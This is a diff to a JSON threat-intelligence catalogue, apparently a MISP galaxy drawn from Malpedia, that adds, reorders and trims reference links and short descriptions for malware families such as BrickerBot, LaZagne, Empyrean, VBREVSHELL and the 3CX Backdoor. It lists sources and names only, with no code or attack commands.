"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/py.brickerbot",
- "http://depastedihrn3jtw.onion/show.php?md5=2c822a990ff22d56f3b9eb89ed722c3f",
- "https://www.bleepingcomputer.com/news/security/brickerbot-author-claims-he-bricked-two-million-devices/",
- "https://www.bleepingcomputer.com/news/security/brickerbot-author-retires-claiming-to-have-bricked-over-10-million-iot-devices/",
- "http://seclists.org/fulldisclosure/2017/Mar/7",
+ "https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/",
"https://www.trustwave.com/Resources/SpiderLabs-Blog/BrickerBot-mod_plaintext-Analysis/",
"https://ics-cert.us-cert.gov/alerts/ICS-ALERT-17-102-01A",
- "https://security.radware.com/ddos-threats-attacks/brickerbot-pdos-permanent-denial-of-service/"
+ "https://www.bleepingcomputer.com/news/security/brickerbot-author-claims-he-bricked-two-million-devices/",
+ "http://seclists.org/fulldisclosure/2017/Mar/7",
+ "http://depastedihrn3jtw.onion/show.php?md5=2c822a990ff22d56f3b9eb89ed722c3f",
+ "https://www.bleepingcomputer.com/news/security/brickerbot-author-retires-claiming-to-have-bricked-over-10-million-iot-devices/"
],
"synonyms": [],
"type": []
@@ -10487,6 +10996,19 @@
"uuid": "53dd4a8b-374e-48b6-a7c8-58af0e31f435",
"value": "DropboxC2C"
},
+ {
+ "description": "Discord Stealer written in Python with Javascript-based inject files.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/py.empyrean",
+ "https://www.cyberark.com/resources/threat-research-blog/the-not-so-secret-war-on-discord"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "b1aa0be3-b725-4135-b0b9-3a895d4ef047",
+ "value": "Empyrean"
+ },
{
"description": "According to Kaspersky Labs, Guard is a malware developed by threat actor WildPressure. It is written in Python and packaged using PyInstaller, both for Windows and macOS operating systems. Its intrinsics resemble parts of how win.milum operates.",
"meta": {
@@ -10519,28 +11041,21 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/py.lazagne",
"https://github.com/AlessandroZ/LaZagne",
- "https://attack.mitre.org/groups/G0100/",
- "https://attack.mitre.org/groups/G0100",
- "https://www.infinitumit.com.tr/apt-35/",
- "https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx",
- "https://edu.anarcho-copy.org/Against%20Security%20&%20%20Self%20Security/Group-IB%20RedCurl.pdf",
- "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/",
"https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/",
- "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/"
+ "https://attack.mitre.org/groups/G0100/",
+ "https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx",
+ "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/",
+ "https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html",
+ "https://attack.mitre.org/groups/G0100",
+ "https://edu.anarcho-copy.org/Against%20Security%20&%20%20Self%20Security/Group-IB%20RedCurl.pdf",
+ "https://www.mandiant.com/resources/blog/alphv-ransomware-backup",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
+ "https://www.infinitumit.com.tr/apt-35/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "d0394d50-5316-4405-aa77-1070bdf68b6a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "c752f295-7f08-4cb0-92d5-a0c562abd08c",
"value": "LaZagne"
},
@@ -10577,19 +11092,20 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/py.n3cr0m0rph",
- "https://github.com/lacework/lacework-labs/tree/master/keksec",
- "https://blogs.juniper.net/en-us/threat-research/necro-python-botnet-goes-after-vulnerable-visualtools-dvr",
- "https://twitter.com/xuy1202/status/1393384128456794116",
- "https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/",
"https://www.bleepingcomputer.com/news/security/freakout-malware-worms-its-way-into-vulnerable-vmware-servers/",
- "https://www.lacework.com/blog/spytech-necro-keksecs-latest-python-malware/",
- "https://blog.talosintelligence.com/2021/06/necro-python-bot-adds-new-tricks.html",
"https://blog.netlab.360.com/not-really-new-pyhton-ddos-bot-n3cr0m0rph-necromorph/",
- "https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/",
- "https://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/",
- "https://www.lacework.com/the-kek-security-network/",
"https://twitter.com/xuy1202/status/1392089568384454657",
- "https://www.lacework.com/keksec-tsunami-ryuk/"
+ "https://www.lacework.com/blog/the-kek-security-network/",
+ "https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/",
+ "https://www.lacework.com/blog/spytech-necro-keksecs-latest-python-malware/",
+ "https://www.lacework.com/keksec-tsunami-ryuk/",
+ "https://blogs.juniper.net/en-us/threat-research/necro-python-botnet-goes-after-vulnerable-visualtools-dvr",
+ "https://blog.talosintelligence.com/2021/06/necro-python-bot-adds-new-tricks.html",
+ "https://github.com/lacework/lacework-labs/tree/master/keksec",
+ "https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/",
+ "https://www.lacework.com/the-kek-security-network/",
+ "https://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/",
+ "https://twitter.com/xuy1202/status/1393384128456794116"
],
"synonyms": [
"FreakOut",
@@ -10631,14 +11147,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/py.poet_rat",
- "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
- "https://securelist.com/apt-trends-report-q3-2020/99204/",
- "https://blog.talosintelligence.com/2020/10/poetrat-update.html",
- "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
"https://www.dragos.com/blog/industry-news/new-ics-threat-activity-group-stibnite/",
- "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf",
+ "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html",
+ "https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/",
+ "https://blog.talosintelligence.com/2020/10/poetrat-update.html",
+ "https://blog.talosintelligence.com/yorotrooper-espionage-campaign-cis-turkey-europe/",
+ "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
"https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/",
- "https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/"
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf"
],
"synonyms": [],
"type": []
@@ -10646,16 +11163,29 @@
"uuid": "b07819a9-a2f7-454d-a520-c6424cbf1ed4",
"value": "Poet RAT"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/py.powerat",
+ "https://blog.phylum.io/a-deep-dive-into-powerat-a-newly-discovered-stealer/rat-combo-polluting-pypi"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "b5cb3d2b-0205-4883-aaff-0d0b7a7f032d",
+ "value": "poweRAT"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/py.pupy",
- "https://go.recordedfuture.com/hubfs/reports/cta-2020-0123.pdf",
"https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf",
"https://www.secureworks.com/research/threat-profiles/cobalt-gypsy",
- "https://www.secureworks.com/research/threat-profiles/cobalt-trinity",
- "https://github.com/n1nj4sec/pupy"
+ "https://go.recordedfuture.com/hubfs/reports/cta-2020-0123.pdf",
+ "https://github.com/n1nj4sec/pupy",
+ "https://www.secureworks.com/research/threat-profiles/cobalt-trinity"
],
"synonyms": [],
"type": []
@@ -10663,6 +11193,18 @@
"uuid": "afcc9bfc-1227-4bb0-a88a-5accdbfd58fa",
"value": "pupy (Python)"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/py.pyaesloader"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "b9ba4f66-78dc-491f-8fd4-0143816ce80e",
+ "value": "PyAesLoader"
+ },
{
"description": "",
"meta": {
@@ -10681,8 +11223,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/py.pyback",
- "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_001",
- "https://github.com/7h3w4lk3r/pyback"
+ "https://github.com/7h3w4lk3r/pyback",
+ "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_001"
],
"synonyms": [],
"type": []
@@ -10690,13 +11232,26 @@
"uuid": "6d96cd1e-98f4-4784-9982-397c5df19bd9",
"value": "pyback"
},
+ {
+ "description": "According to Securonix, this malware exhibits remote access trojan (RAT) behavior, allowing for control of and persistence on the affected host. As with other RATs, PY#RATION possesses a whole host of features and capabilities, including data exfiltration and keylogging. What makes this malware particularly unique is its utilization of websockets for both command and control (C2) communication and exfiltration as well as how it evades detection from antivirus and network security measures.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/py.pyration",
+ "https://www.securonix.com/blog/security-advisory-python-based-pyration-attack-campaign/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "1dc471d3-6303-48a1-a17a-b4f29e5ba6a9",
+ "value": "PY#RATION"
+ },
{
"description": "PyVil RAT",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/py.pyvil",
- "https://www.cybereason.com/blog/no-rest-for-the-wicked-evilnum-unleashes-pyvil-rat",
- "https://twitter.com/ESETresearch/status/1360178593968623617"
+ "https://twitter.com/ESETresearch/status/1360178593968623617",
+ "https://www.cybereason.com/blog/no-rest-for-the-wicked-evilnum-unleashes-pyvil-rat"
],
"synonyms": [],
"type": []
@@ -10739,9 +11294,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/py.serpent",
- "https://blogs.vmware.com/security/2022/04/serpent-the-backdoor-that-hides-in-plain-sight.html",
"https://www.bleepingcomputer.com/news/security/serpent-malware-campaign-abuses-chocolatey-windows-package-manager/",
- "https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain"
+ "https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain",
+ "https://blogs.vmware.com/security/2022/04/serpent-the-backdoor-that-hides-in-plain-sight.html"
],
"synonyms": [],
"type": []
@@ -10826,6 +11381,20 @@
"uuid": "0bd5aed2-9c74-41a5-9fcf-9379f2cb0e2c",
"value": "Venomous"
},
+ {
+ "description": "Venus Stealer is a python based Infostealer observed early 2023.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/py.venus_stealer",
+ "https://geekypandatales.wordpress.com/2023/02/19/the-infostealer-pie-python-malware-analysis/",
+ "https://twitter.com/0xToxin/status/1625435116771180546"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "20f72d3c-87b7-4349-ad1b-59d7909c1df4",
+ "value": "Venus Stealer"
+ },
{
"description": "",
"meta": {
@@ -10857,15 +11426,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/vbs.cageychameleon",
+ "https://vb2020.vblocalhost.com/conference/presentations/unveiling-the-cryptomimic/",
+ "https://www.clearskysec.com/wp-content/uploads/2021/05/CryptoCore-Lazarus-Clearsky.pdf",
+ "https://cyberstruggle.org/delta/LeeryTurtleThreatReport_05_20.pdf",
+ "https://www.clearskysec.com/cryptocore-group/",
+ "https://www.proofpoint.com/us/blog/threat-insight/ta444-apt-startup-aimed-at-your-funds",
"https://www.clearskysec.com/wp-content/uploads/2020/06/CryptoCore_Group.pdf",
"https://atlas-cybersecurity.com/cyber-threats/cryptocore-cryptocurrency-exchanges-under-attack/",
- "https://vb2020.vblocalhost.com/conference/presentations/unveiling-the-cryptomimic/",
- "https://www.proofpoint.com/us/daily-ruleset-update-summary-20190314",
- "https://www.clearskysec.com/wp-content/uploads/2021/05/CryptoCore-Lazarus-Clearsky.pdf",
- "https://www.clearskysec.com/cryptocore-group/",
- "https://cyberstruggle.org/delta/LeeryTurtleThreatReport_05_20.pdf"
+ "https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwjCk7uOzMP-AhXOYMAKHYtLCKkQFnoECBIQAQ&url=https%3A%2F%2Fi.blackhat.com%2FUSA-22%2FThursday%2FUS-22-Wikoff-Talent-Need-Not-Apply.pdf&usg=AOvVaw0deqd7ozZyRTfSBOBmlbiG",
+ "https://www.proofpoint.com/us/daily-ruleset-update-summary-20190314"
+ ],
+ "synonyms": [
+ "Cabbage RAT"
],
- "synonyms": [],
"type": []
},
"uuid": "ea71b7c1-79eb-4e9c-a670-ea75d80132f4",
@@ -10918,8 +11491,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/vbs.grinju",
- "https://medium.com/@vishal_thakur/grinju-malware-anti-analysis-on-steroids-part-1-535e72e650b8",
- "https://medium.com/@vishal_thakur/grinju-downloader-anti-analysis-on-steroids-part-2-8d76f427c0ce"
+ "https://medium.com/@vishal_thakur/grinju-downloader-anti-analysis-on-steroids-part-2-8d76f427c0ce",
+ "https://medium.com/@vishal_thakur/grinju-malware-anti-analysis-on-steroids-part-1-535e72e650b8"
],
"synonyms": [],
"type": []
@@ -10932,9 +11505,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/vbs.halfbaked",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
+ "https://attack.mitre.org/software/S0151/",
"https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html",
- "https://attack.mitre.org/software/S0151/"
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf"
],
"synonyms": [],
"type": []
@@ -10959,32 +11532,36 @@
"value": "Iloveyou"
},
{
- "description": "Malware is delivered by emails, containing links to ZIP files or ZIP attachments. The ZIP contains a VBscript that, when executed, downloads additional files from AWS S3, Google Drive or other cloud hosting services. The downloaded files are encrypted .exe and .dll files.\r\nThe malware targets banking clients in Portugal.",
+ "description": "",
"meta": {
"refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.lampion",
- "https://securityaffairs.co/wordpress/128975/malware/hidden-c2-lampion-trojan-release-212.html",
- "https://research.checkpoint.com/wp-content/uploads/2019/12/Threat_Intelligence_News_2019-12-30.pdf",
- "https://seguranca-informatica.pt/trojan-lampion-is-back-after-3-months/",
- "https://seguranca-informatica.pt/the-hidden-c2-lampion-trojan-release-212-is-on-the-rise-and-using-a-c2-server-for-two-years",
- "https://unit42.paloaltonetworks.com/single-bit-trap-flag-intel-cpu/",
- "https://seguranca-informatica.pt/targeting-portugal-a-new-trojan-lampion-has-spread-using-template-emails-from-the-portuguese-government-finance-tax/",
- "https://seguranca-informatica.pt/new-release-of-lampion-trojan-spreads-in-portugal-with-some-improvements-on-the-vbs-downloader",
- "https://cofense.com/blog/lampion-trojan-utilizes-new-delivery-through-cloud-based-sharing",
- "https://seguranca-informatica.pt/lampion-trojan-disseminated-in-portugal-using-covid-19-template/"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.janicab",
+ "https://securelist.com/deathstalker-targets-legal-entities-with-new-janicab-variant/108131/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "b3cb5859-2049-43d3-aed2-73db45ed0112",
+ "value": "Janicab (VBScript)"
+ },
+ {
+ "description": "Malware is delivered by emails, containing links to ZIP files or ZIP attachments. The ZIP contains a VBscript that, when executed, downloads additional files from AWS S3, Google Drive or other cloud hosting services. The downloaded files are encrypted .exe and .dll files.\r\nThe malware targets banking clients in Portugal.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.lampion",
+ "https://research.checkpoint.com/wp-content/uploads/2019/12/Threat_Intelligence_News_2019-12-30.pdf",
+ "https://seguranca-informatica.pt/the-hidden-c2-lampion-trojan-release-212-is-on-the-rise-and-using-a-c2-server-for-two-years",
+ "https://seguranca-informatica.pt/new-release-of-lampion-trojan-spreads-in-portugal-with-some-improvements-on-the-vbs-downloader",
+ "https://seguranca-informatica.pt/lampion-trojan-disseminated-in-portugal-using-covid-19-template/",
+ "https://seguranca-informatica.pt/trojan-lampion-is-back-after-3-months/",
+ "https://unit42.paloaltonetworks.com/single-bit-trap-flag-intel-cpu/",
+ "https://cofense.com/blog/lampion-trojan-utilizes-new-delivery-through-cloud-based-sharing",
+ "https://seguranca-informatica.pt/targeting-portugal-a-new-trojan-lampion-has-spread-using-template-emails-from-the-portuguese-government-finance-tax/",
+ "https://securityaffairs.co/wordpress/128975/malware/hidden-c2-lampion-trojan-release-212.html"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "dd299e22-bf82-4317-8c81-c6b1f7514571",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "97f89048-2a57-48d5-9272-0d1061a14eca",
"value": "lampion"
},
@@ -11011,15 +11588,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "2bea2cc9-c1cc-453d-a483-541b895867d1",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "e9afcd80-c1c6-4194-af32-133fe31e835f",
"value": "MOUSEISLAND"
},
@@ -11054,14 +11622,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/vbs.starwhale",
+ "https://thehackernews.com/2022/02/irans-muddywater-hacker-group-using-new.html",
"https://www.techrepublic.com/article/muddywater-targets-middle-eastern-and-asian-countries-in-phishing-attacks/",
"https://www.inforisktoday.com/muddywater-targets-critical-infrastructure-in-asia-europe-a-18611",
"https://www.mandiant.com/resources/telegram-malware-iranian-espionage",
"https://thehackernews.com/2022/03/iranian-hackers-targeting-turkey-and.html",
+ "https://blog.talosintelligence.com/iranian-supergroup-muddywater/",
+ "https://www.govinfosecurity.com/iranian-apt-new-methods-to-target-turkey-arabian-peninsula-a-18706",
"https://rootdaemon.com/2022/03/10/iranian-hackers-targeting-turkey-and-arabian-peninsula-in-new-malware-campaign/",
- "https://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html",
- "https://thehackernews.com/2022/02/irans-muddywater-hacker-group-using-new.html",
- "https://www.govinfosecurity.com/iranian-apt-new-methods-to-target-turkey-arabian-peninsula-a-18706"
+ "https://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html"
],
"synonyms": [
"Canopy",
@@ -11104,6 +11673,7 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/vbs.unidentified_003",
"https://aaqeel01.wordpress.com/2021/01/18/docx-files-template-injection/",
+ "https://threatmon.io/beyond-bullets-and-bombs-an-examination-of-armageddon-groups-cyber-warfare-against-ukraine/",
"https://www.threatstop.com/blog/gamaredon-group-understanding-the-russian-apt"
],
"synonyms": [],
@@ -11125,6 +11695,60 @@
"uuid": "84c6b483-ba17-4a22-809d-dc37d9ce1822",
"value": "Unidentified VBS 004 (RAT)"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.unidentified_005",
+ "https://unit42.paloaltonetworks.com/trident-ursa/",
+ "https://threatmon.io/beyond-bullets-and-bombs-an-examination-of-armageddon-groups-cyber-warfare-against-ukraine/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "8eb8ebbc-c5b1-47d8-816a-4e21dee145c3",
+ "value": "Unidentified VBS 005 (Telegram Loader)"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.unidentified_006",
+ "https://blogs.blackberry.com/en/2023/01/gamaredon-abuses-telegram-to-target-ukrainian-organizations",
+ "https://threatmon.io/beyond-bullets-and-bombs-an-examination-of-armageddon-groups-cyber-warfare-against-ukraine/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a6bd28db-c1a3-44b1-8bc3-7882e2896d67",
+ "value": "Unidentified VBS 006 (Telegram Loader)"
+ },
+ {
+ "description": "According to Mandiant, VBREVSHELL is a VBA macro that spawns a reverse shell relying exclusively on Windows API calls.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.vbrevshell",
+ "https://www.mandiant.com/media/17826"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "991179a0-efd5-450a-a1ce-78d1109bb50b",
+ "value": "VBREVSHELL"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.wasabiseed",
+ "https://www.proofpoint.com/us/blog/threat-insight/screentime-sometimes-it-feels-like-somebodys-watching-me"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "0c6568da-7017-4d9f-b077-0c486b3f9057",
+ "value": "WasabiSeed"
+ },
{
"description": "",
"meta": {
@@ -11151,31 +11775,68 @@
"uuid": "24e598cf-4c55-468a-ac1d-cc4f89104943",
"value": "000Stealer"
},
+ {
+ "description": "According to CrowdStrike, this backdoor was discovered being embedded in a legitimate, signed version of 3CXDesktopApp, and thus constitutes a supply chain attack.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.3cx_backdoor",
+ "https://www.fortinet.com/blog/threat-research/3cx-desktop-app-compromised",
+ "https://www.welivesecurity.com/2023/04/20/linux-malware-strengthens-links-lazarus-3cx-supply-chain-attack",
+ "https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/",
+ "https://blogs.vmware.com/security/2023/03/investigating-3cx-desktop-application-attacks-what-you-need-to-know.html",
+ "https://www.splunk.com/en_us/blog/security/splunk-insights-investigating-the-3cxdesktopapp-supply-chain-compromise.html",
+ "https://www.reversinglabs.com/blog/red-flags-fly-over-supply-chain-compromised-3cx-update",
+ "https://github.com/dodo-sec/Malware-Analysis/blob/main/SmoothOperator/SmoothOperator.md",
+ "https://www.cadosecurity.com/forensic-triage-of-a-windows-system-running-the-backdoored-3cx-desktop-app/",
+ "https://www.group-ib.com/blog/3cx-supply-chain-attack/?utm_source=twitter&utm_campaign=3cx-blog&utm_medium=social",
+ "https://www.trendmicro.com/en_us/research/23/c/information-on-attacks-involving-3cx-desktop-app.html",
+ "https://www.youtube.com/watch?v=fTX-vgSEfjk",
+ "https://www.crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/",
+ "https://www.zscaler.com/security-research/3CX-supply-chain-attack-analysis-march-2023",
+ "https://blog.cyble.com/2023/03/31/a-comprehensive-analysis-of-the-3cx-attack",
+ "https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/",
+ "https://www.rapid7.com/blog/post/2023/03/30/backdoored-3cxdesktopapp-installer-used-in-active-threat-campaign/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3cx-supply-chain-attack",
+ "https://www.elastic.co/security-labs/elastic-users-protected-from-suddenicon-supply-chain-attack",
+ "https://research.openanalysis.net/3cx/northkorea/apt/triage/2023/03/30/3cx-malware.html#Functionality",
+ "https://blogs.blackberry.com/en/2023/03/initial-implants-and-network-analysis-suggest-the-3cx-supply-chain-operation-goes-back-to-fall-2022",
+ "https://www.huntress.com/blog/3cx-voip-software-compromise-supply-chain-threats",
+ "https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/"
+ ],
+ "synonyms": [
+ "SUDDENICON"
+ ],
+ "type": []
+ },
+ "uuid": "b6a00e25-9d8d-4ebc-b9fc-7fd41797303b",
+ "value": "3CX Backdoor (Windows)"
+ },
{
"description": "Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim’s sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger",
- "https://www.fortinet.com/blog/threat-research/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware",
+ "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
"https://blogs.blackberry.com/en/2022/06/threat-thursday-unique-delivery-method-for-snake-keylogger",
+ "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--102",
"https://x-junior.github.io/malware%20analysis/2022/06/24/Snakekeylogger.html",
+ "https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter",
+ "https://www.fortinet.com/blog/threat-research/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
"https://threatresearch.ext.hp.com/the-many-skins-of-snake-keylogger/",
- "https://habr.com/ru/company/group-ib/blog/477198/",
+ "https://www.malwarebytes.com/blog/threat-intelligence/2022/20221121-threat-intel-report-final.pdf",
+ "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--89",
+ "https://www.cybereason.com/blog/threat-analysis-report-snake-infostealer-malware",
+ "https://threatresearch.ext.hp.com/pdf-malware-is-not-yet-dead/",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
+ "https://www.bleepingcomputer.com/news/security/pdf-smuggles-microsoft-word-doc-to-drop-snake-keylogger-malware/",
+ "https://twitter.com/James_inthe_box/status/1401921257109561353",
+ "https://malwarebookreports.com/cross-platform-java-dropper-snake-and-xloader-mac-version/",
+ "https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/",
"https://cert.gov.ua/article/955924",
"https://blog.netlab.360.com/purecrypter",
- "https://www.bleepingcomputer.com/news/security/pdf-smuggles-microsoft-word-doc-to-drop-snake-keylogger-malware/",
- "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
- "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--102",
- "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
- "https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/",
- "https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter",
- "https://twitter.com/James_inthe_box/status/1401921257109561353",
- "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--89",
- "https://malwarebookreports.com/cross-platform-java-dropper-snake-and-xloader-mac-version/",
- "https://threatresearch.ext.hp.com/pdf-malware-is-not-yet-dead/",
- "https://www.youtube.com/watch?v=vzyJp2w8bPE",
- "https://www.cybereason.com/blog/threat-analysis-report-snake-infostealer-malware"
+ "https://habr.com/ru/company/group-ib/blog/477198/",
+ "https://www.youtube.com/watch?v=vzyJp2w8bPE"
],
"synonyms": [
"404KeyLogger",
@@ -11191,6 +11852,7 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.4h_rat",
+ "https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html",
"https://github.com/securitykitten/malware_references/blob/master/crowdstrike-intelligence-report-putter-panda.original.pdf",
"https://attack.mitre.org/groups/G0024"
],
@@ -11205,8 +11867,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.7ev3n",
- "https://www.cyber.nj.gov/threat-profiles/ransomware-variants/7ev3n",
- "https://blog.malwarebytes.com/threat-analysis/2016/05/7ev3n-ransomware/"
+ "https://blog.malwarebytes.com/threat-analysis/2016/05/7ev3n-ransomware/",
+ "https://www.cyber.nj.gov/threat-profiles/ransomware-variants/7ev3n"
],
"synonyms": [],
"type": []
@@ -11219,27 +11881,31 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.8t_dropper",
- "https://blog.malwarelab.pl/posts/on_the_royal_road/",
+ "https://www.sentinelone.com/labs/targets-of-interest-russian-organizations-increasingly-under-attack-by-chinese-apts/",
"https://community.riskiq.com/article/5fe2da7f",
- "https://nao-sec.org/2021/01/royal-road-redive.html",
+ "https://blog.malwarelab.pl/posts/on_the_royal_road/",
+ "https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf",
+ "https://tradahacking.vn/another-malicious-document-with-cve-2017-11882-839e9c0bbf2f",
+ "https://research.checkpoint.com/2019/rancor-the-year-of-the-phish/",
"https://securelist.com/cycldek-bridging-the-air-gap/97157/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0922.pdf",
+ "https://medium.com/@Ilandu/portdoor-malware-afc9d0796cba",
